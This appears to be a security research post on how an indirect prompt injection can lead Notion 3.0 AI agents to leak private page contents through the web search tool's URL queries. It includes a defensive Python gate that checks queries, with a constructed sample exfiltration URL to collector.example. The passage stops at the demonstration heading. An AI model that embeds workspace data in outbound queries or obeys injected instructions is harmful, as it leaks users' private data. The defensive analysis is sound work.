
Hidden risk in Notion 3.0 AI agents: Web search tool abuse for data exfiltration


AI agents are increasingly being integrated into SaaS platforms. Notion today announced that, as part of their Notion 3.0 milestone, they will be introducing AI Agents that can do everything you can in Notion—create docs, update databases, search across connected tools, and carry out multi-step workflows by planning and executing actions with MCP integrations. You can personalize or even build teams of Custom Agents that run on triggers or schedules, giving you autonomous assistants that continuously handle tasks like compiling feedback, updating trackers, and triaging requests.

The lethal trifecta problem

The "lethal trifecta," as described by Simon Willison, is the combination of LLM agents, tool access, and long-term memory that together enable powerful but easily exploitable attack vectors.

With Notion 3.0, traditional RBAC controls no longer fully apply once AI Agents can autonomously plan actions and call MCP-integrated or built-in tools. An agent with broad workspace access can chain tasks across documents, databases, and external connectors in ways RBAC never anticipated. This creates a vastly expanded threat surface where sensitive data or actions can be exfiltrated or misused through multi-step, automated workflows.

Exploiting the web search tool to leak contents of private Notion pages

We analyzed the set of tools available to Notion's AI agents and found that the web search tool has the following name and input schema:

Name: functions.search (web scope)
Input:
  {
    "web": {
      "queries": ["", "..."]   // array of query strings (URLs or search terms)
    }
  }

We identified this input as a significant vulnerability. Since we can construct custom queries, attackers could use this to exfiltrate data from a user's Notion instance to a malicious server on the internet.
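The mitigation that follows from this is a policy gate between the agent's planner and the web search tool: every query the agent wants to send is inspected before the tool runs, and anything that points at a non-allowlisted host or carries a long, high-entropy, base64-shaped token (the natural carrier for page contents in a URL) is refused and logged. The example below is added here and is not Notion's code; it assumes the functions.search input shape shown above, and the ALLOWED_HOSTS set, the thresholds and the two sample calls are hypothetical values constructed for illustration.

```python
import json
import math
import re
from urllib.parse import urlparse, parse_qsl

# Hypothetical allowlist of hosts the web search tool may be pointed at.
# Assumption: a real deployment loads this from policy, not a literal.
ALLOWED_HOSTS = {"developer.mozilla.org", "docs.python.org"}

# Tokens at least this long that are base64/hex-shaped and high-entropy are
# treated as possibly embedded page content rather than a search term.
BLOB_MIN_LEN = 32
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")
ENTROPY_BITS = 4.0      # Shannon entropy per char; prose tokens stay well below
MAX_TOKEN_LEN = 256     # anything longer is refused regardless of content


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_blob(token: str) -> bool:
    """True if token is oversized, or long, base64/hex-shaped and high-entropy."""
    if len(token) > MAX_TOKEN_LEN:
        return True
    return (len(token) >= BLOB_MIN_LEN
            and BLOB_RE.match(token) is not None
            and shannon_entropy(token) >= ENTROPY_BITS)


def check_query(query: str) -> list:
    """Return the reasons this query should be refused (empty list = allow)."""
    reasons = []
    parsed = urlparse(query.strip())
    if parsed.scheme:                       # a URL rather than a bare search term
        host = (parsed.hostname or "").lower()
        if parsed.scheme not in ("http", "https") or host not in ALLOWED_HOSTS:
            reasons.append("host_not_allowed")
        # Path segments, query-string values and the fragment are the usual
        # places content gets smuggled into a URL; inspect each one.
        tokens = [seg for seg in parsed.path.split("/") if seg]
        tokens += [v for _, v in parse_qsl(parsed.query, keep_blank_values=True)]
        if parsed.fragment:
            tokens.append(parsed.fragment)
    else:
        tokens = query.split()              # search terms: inspect each word
    if any(looks_like_blob(t) for t in tokens):
        reasons.append("encoded_blob")
    return reasons


def check_tool_call(call_json: str) -> dict:
    """Evaluate one functions.search call and return the gate decision."""
    call = json.loads(call_json)
    queries = call.get("web", {}).get("queries", [])
    findings = {q: check_query(q) for q in queries}
    return {"allow": not any(findings.values()), "findings": findings}


# Constructed sample calls (not captured from Notion).
BENIGN_CALL = json.dumps({"web": {"queries": [
    "notion database rollup formulas",
    "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers",
]}})
# Non-allowlisted host plus a 64-character parameter value in which every
# URL-safe base64 character appears once (entropy 6.0 bits per character).
SUSPECT_CALL = json.dumps({"web": {"queries": [
    "https://collector.example/log?d="
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",
]}})

if __name__ == "__main__":
    for label, call in (("benign", BENIGN_CALL), ("suspect", SUSPECT_CALL)):
        print(label, check_tool_call(call))
```

The host allowlist is the control that matters most: it removes the agent's ability to reach arbitrary servers at all, and the blob heuristic is a second layer for the case where an allowlisted host is itself a redirector or accepts user-supplied parameters. Refused calls should be logged with the full query, since a stream of blocked high-entropy URLs from one workspace is exactly the signal an indirect prompt injection produces.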

Attack demonstration

We will show how a single well-crafted indirect prompt injection attack can leak the contents of a Notion page.
